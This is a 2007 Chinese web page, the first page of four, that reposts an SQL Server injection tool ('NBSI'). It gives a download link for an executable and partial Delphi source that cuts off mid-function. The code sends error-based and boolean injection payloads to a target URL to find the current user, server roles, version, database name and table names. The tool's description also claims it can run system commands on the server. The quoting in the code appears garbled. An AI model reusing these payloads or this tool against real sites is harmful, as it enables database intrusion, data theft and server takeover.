SQL Server注入工具 1.0_Sql Server_学习笔记★闵涛★计算机学习电脑编程软硬件技巧


	转至繁体中文版	\| 网站首页 \| 图文教程 \| 资源下载 \| 站长博客 \| 图片素材 \| 武汉seo \| 武汉网站优化 \|

SQL Server注入工具 1.0

作者：闵涛文章来源：闵涛的学习笔记点击数：3952 更新时间：2007/11/14 12:57:01

SQL Server注入工具 1.0

利用SQL Server的注入漏洞实现猜解数据库名，表名，字段名及记录的信息，由于网速的原因，目前限制了只能同时猜解前5个字段值的记录信息。另外实现了三种方式执行系统命令，同时可回显显示。

本程序只供测试研究使用，由此软件造成的后果一概不负责任，由于编写比较仓促，代码难免有纰漏之处，欢迎大家批评指正。

下载地址：http://free.efile.com.cn/hnxyy/NBSI.exe

作者:Hnxyy QQ:19026695

2004.12.16 北京

FireFox技术交流论坛
http://www.wrsky.com
临时访问地址
http://firefoxer.nease.net
It is all beginnings free
It is all ruin to be privately owned

D7原代码：

unit untmain;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, idHttp, IdBaseComponent, IdComponent, IdTCPConnection,
IdTCPClient, OleCtrls, SHDocVw,mshtml;

type
TForm1 = class(TForm)
    Label1: TLabel;
    EdtUrl: TEdit;
    BtnCheck: TButton;
    Label2: TLabel;
    GroupBox1: TGroupBox;
    Label7: TLabel;
    Label3: TLabel;
    Label4: TLabel;
    Label5: TLabel;
    Label6: TLabel;
    EdtMuliCase: TEdit;
    EdtQuery: TEdit;
    EdtUser: TEdit;
    EdtPower: TEdit;
    EdtDbName: TEdit;
    Memo1: TMemo;
    GroupBox2: TGroupBox;
    cbDisp: TCheckBox;
    EdtCommand: TEdit;
    rbCmd: TRadioButton;
    rbOA: TRadioButton;
    BtnExecute: TButton;
    GroupBox3: TGroupBox;
    Memo2: TMemo;
    wb: TWebBrowser;
    BtnStop: TButton;
    rbJob: TRadioButton;
    BtnCancel: TButton;
    procedure BtnCheckClick(Sender: TObject);
    procedure BtnExecuteClick(Sender: TObject);
    procedure wbDocumentComplete(Sender: TObject; const pDisp: IDispatch;
      var URL: OleVariant);
    procedure BtnStopClick(Sender: TObject);
    procedure rbCmdClick(Sender: TObject);
    procedure rbOAClick(Sender: TObject);
    procedure rbJobClick(Sender: TObject);
    procedure FormShow(Sender: TObject);
    procedure BtnCancelClick(Sender: TObject);
private
    { Private declarations }
    tag:integer;
    isFinish,isCancel:boolean;
    function Get(URL: string): boolean;
    function GetWBMsg(URL: string): string;
    Function StrToNChar(DbName,TName:string): string;
    procedure SetRdbCheck(rd:TRadioButton);
public
    { Public declarations }
end;

var
Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.BtnCheckClick(Sender: TObject);
const
vFieldCount=5;
PowerStr :array[0..6] of string=(
     ''''sysadmin'''',''''dbcreator'''',''''diskadmin'''',
     ''''processadmin'''',''''serveradmin'''',
     ''''setupadmin'''',''''securityadmin'''');
var
Url,DbName,TName,TName0,ColName,ColName0,NCharStr:string;
i,j,k,iCount:integer;
VerStr,ValueStr,CountStr,Powers:string;
FieldStr,FieldOrdStr,CFieldStr:string;
vfield:OleVariant;
begin
try
    EdtMuliCase.Text :='''''''';
    EdtQuery.Text :='''''''';
    EdtUser.Text :='''''''';
    EdtPower.Text :='''''''';
    EdtDbName.Text :='''''''';
    Url:=trim(EdtUrl.Text);
    isFinish :=False;
    vfield :=VarArrayCreate([0,vFieldCount-1],varVariant);
    Memo1.Clear;
    Screen.Cursor :=crHourGlass;
    //判断是否支持多句查询
    if Get(Url+'''';declare%20@a%20int--'''') then
    begin
      EdtMuliCase.Text :=''''支持'''';
    end else
    begin
      EdtMuliCase.Text :=''''不支持'''';
    end;
    //判断是否支持子查询
    if get(Url+''''%20and%20(Select%20count(1)%20from%20[sysobjects])>=0'''') then
    begin
      EdtQuery.Text :=''''支持'''';
    end else
    begin
      EdtQuery.Text :=''''不支持'''';
    end;
    //取得当前用户
    EdtUser.Text :=GetWBMsg(Url+''''%20and%20char(124)%2Buser%2Bchar(124)=0'''');
    //取得当前用户登录的服务器角色成员
    for i:=0 to High(PowerStr) do
    begin
      if get(Url+''''%20And%20Cast(IS_SRVROLEMEMBER(''''''''''''+PowerStr[i]+'''''''''''')%20as%20varchar(1))=1'''') then
      begin
        Powers :=Powers+PowerStr[i]+''''|'''';
      end;
    end;
    if Powers='''''''' then
      EdtPower.Text :=''''未知''''
    else EdtPower.Text :=Powers;
    //指明当前用户是否为 db_owner 固定数据库角色的成员
{ if get(Url+''''%20And%20Cast(IS_MEMBER(''''''''db_owner'''''''')%20as%20varchar(1))=1'''') then
    begin
      EdtPower.Text :=''''db_owner'''';
    end else
    begin
      EdtPower.Text :=''''未知'''';
    end; }
    //得到当前SQL Server的版本号
    VerStr :=GetWBMsg(Url+''''%20and%20char(124)%2B@@version%2Bchar(124)>0'''');
    Memo1.Lines.Add(''''当前版本号：''''+VerStr);
    Memo1.Lines.Add('''''''');
    //取得数据库名
    DbName :=GetWBMsg(Url+''''%20And%20char(124)%2Bdb_name()%2Bchar(124)=0'''');
    EdtDbName.Text :=DbName;
    if (DbName='''''''') or (DbName=''''未知'''') then
    begin
      Memo1.Lines.Add(''''未知的数据库，操作终止！'''');
      exit;
    end;
    Memo1.Lines.Add(''''当前数据库：''''+DbName);
    BtnStop.Visible :=true;
    BtnCheck.Visible :=False;
    //猜解表名
    Memo1.Lines.Add('''''''');
    Memo1.Lines.Add(''''开始猜解表名.....'''');
    Memo1.Lines.Add(''''#######################'''');
    for i:=1 to 1000 do
    begin
      TName :='''''''';
      TName :=GetWBMsg(Url+''''%20And%20(Select%20Top%201%20cast(char(124)%2Bname%2Bchar(124)%20as%20varchar(8000))''''+
                       ''''%20from(Select%20Top%20''''+inttostr(i)+''''%20id,name%20from%20[''''+DbName+'''']..[sysobjects]''''+
                       ''''%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0;--'''');
      if (TName0=T

[1] [2] [3] [4] 下一页

[Access]sql随机抽取记录  [Access]ASP&SQL让select查询结果随机排序的实现方法
[聊天工具]企业邮件系统的利器----FoxMail Server  [系统软件]OPEN SERVER 5.0.5安装EXP300阵列柜
[系统软件]SQL语句性能优化--LECCO SQL Expert  [系统软件]关于Windows2000Server的灾难恢复
[常用软件][网络]下载服务革命性风暴Poco Server评测  [C语言系列]动态创建SQL Server数据库、表、存储过程等架构信…
[C语言系列]SQL Server到DB2连接服务器的实现  [C语言系列]SQL Server到SYBASE连接服务器的实现

教程录入：mintao 责任编辑：mintao

上一篇教程：在注册表中删除MSSQL无用的数据库注册

下一篇教程：为ASP.NET封装的SQL数据库访问类

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

注：本站部分文章源于互联网，版权归原作者所有！如有侵权，请原作者与本站联系，本站将立即删除！本站文章除特别注明外均可转载，但需注明出处！ [MinTao学以致用网]

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

同类栏目

· Sql Server  · MySql
· Access  · ORACLE
· SyBase  · 其他

热门推荐

没有教程

赞助链接

闵涛博文

500 - 内部服务器错误。

您查找的资源存在问题，因而无法显示。

鄂公网安备 42011102001154号

站长：MinTao ICP备案号：鄂ICP备11006601号-18

闵涛站盟:医药大全-武穴网。A打造B、C、D……